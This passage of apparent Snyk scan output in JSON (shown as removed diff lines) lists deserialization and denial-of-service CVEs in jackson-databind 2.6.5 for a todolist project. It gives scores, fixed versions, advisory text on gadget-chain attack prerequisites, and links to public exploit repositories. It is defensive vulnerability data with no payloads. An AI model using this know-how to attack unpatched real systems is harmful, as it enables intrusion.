Issue](https://github.com/FasterXML/jackson-databind/issues/3590)\n", - "epssDetails": { - "percentile": "0.65501", - "probability": "0.00252", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-42003" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2022-10-02T09:41:44.046865Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-10-02T09:22:10Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2022-10-02T09:54:05Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:57.258948Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "credit": [ - "Liao Xinxi" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.1)", - "[2.7.0,2.7.9.1)", - "[2.8.0,2.8.9)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.1", - "2.7.9.1", - "2.8.9" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.6.7.1)", - "[2.7,2.7.9.1)", - "[2.8,2.8.9)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/JavanXD/Demo-Exploit-Jackson-RCE", - "title": "Exploit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/1599", - "title": "GitHub Issue" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id&%23x3D%3B1462702", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:28.679692Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:49.385289Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:59.167922Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:28.679692Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:49.385289Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker may exploit this issue by sending a maliciously crafted input to the `readValue` method of the `ObjectMapper`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.1, 2.7.9.1, 2.8.9 or higher.\n## References\n- [Exploit](https://github.com/JavanXD/Demo-Exploit-Jackson-RCE)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1599)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1462702)\n", - "epssDetails": { - "percentile": "0.97700", - "probability": "0.57112", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2017-7525" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-qxxx-2pp7-5hmx" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2017-09-14T14:43:48.569000Z", - "functions_new": [ - { - "version": [ - "[,2.6.7.1)", - "[2.7,2.7.9.1)", - "[2.8,2.8.9)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2017-04-10T21:00:00Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2017-09-14T14:43:48Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:49.385289Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31573", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Liao Xinxi" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.1)", - "[2.7.0,2.7.9.1)", - "[2.8.0,2.8.10)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.6.7.1", - "2.7.9.1", - "2.8.10" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.6.7.1)", - "[2.7,2.7.9.1)", - "[2.8,2.8.10)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/e8f043d1", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/1680", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/1737", - "title": "GitHub Issue" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id&%23x3D%3B1506612", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:46:53.619980Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:46.857906Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:13.013603Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:46:53.619980Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:46.857906Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.1, 2.7.9.1, 2.8.10 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/e8f043d1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1680)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1737)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1506612)\n", - "epssDetails": { - "percentile": "0.92802", - "probability": "0.04801", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2017-15095" - ], - "CWE": [ - "CWE-184" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2017-11-07T13:13:32.343000Z", - "functions_new": [ - { - "version": [ - "[,2.6.7.1)", - "[2.7,2.7.9.1)", - "[2.8,2.8.10)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2017-06-26T21:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2017-11-09T03:13:32Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:46.857906Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "credit": [ - "Imre Rad" - ], - "semver": { - "vulnerable": [ - "[,2.8.11)", - "[2.9.0,2.9.4)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.8.11", - "2.9.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.8.11)", - "[2.9,2.9.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/2235894210c75f624a3d0cd60bfb0434a20a18bf", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/1855", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/irsl/jackson-rce-via-spel/", - "title": "PoC Project" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:06.545272Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:58.597489Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:20.686860Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:06.545272Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:58.597489Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the Spring libraries are available in the classpath.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.8.11, 2.9.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/2235894210c75f624a3d0cd60bfb0434a20a18bf)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1855)\n- [PoC Project](https://github.com/irsl/jackson-rce-via-spel/)\n", - "epssDetails": { - "percentile": "0.95701", - "probability": "0.13977", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2017-17485" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-01-11T11:41:28.547000Z", - "functions_new": [ - { - "version": [ - "[,2.8.11)", - "[2.9,2.9.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-01-10T11:41:28Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-01-22T12:30:55Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:58.597489Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32044", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Rui Chong" - ], - "semver": { - "vulnerable": [ - "[,2.8.11)", - "[2.9.0,2.9.4)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.8.11", - "2.9.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.8.11)", - "[2.9,2.9.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/GulajavaMinistudio/jackson-databind/pull/92/commits/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/1899", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:48.440088Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:59.857985Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:07.715996Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:48.440088Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:59.857985Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) and [CVE-2017-17485](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043)). This is exploitable via two different gadgets that bypass a blacklist.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.8.11, 2.9.4 or higher.\n## References\n- [GitHub Commit](https://github.com/GulajavaMinistudio/jackson-databind/pull/92/commits/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1899)\n", - "epssDetails": { - "percentile": "0.94704", - "probability": "0.09270", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-5968" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-w3f4-3q6j-rh82" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-01-22T15:40:18.105000Z", - "functions_new": [ - { - "version": [ - "[,2.8.11)", - "[2.9,2.9.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-01-18T15:40:18Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-01-23T13:17:24Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:59.857985Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32111", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.5)", - "[2.7.0, 2.8.11.1)", - "[2.9.0, 2.9.5)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.6.7.5", - "2.8.11.1", - "2.9.5" - ], - "patches": [], - "insights": { - 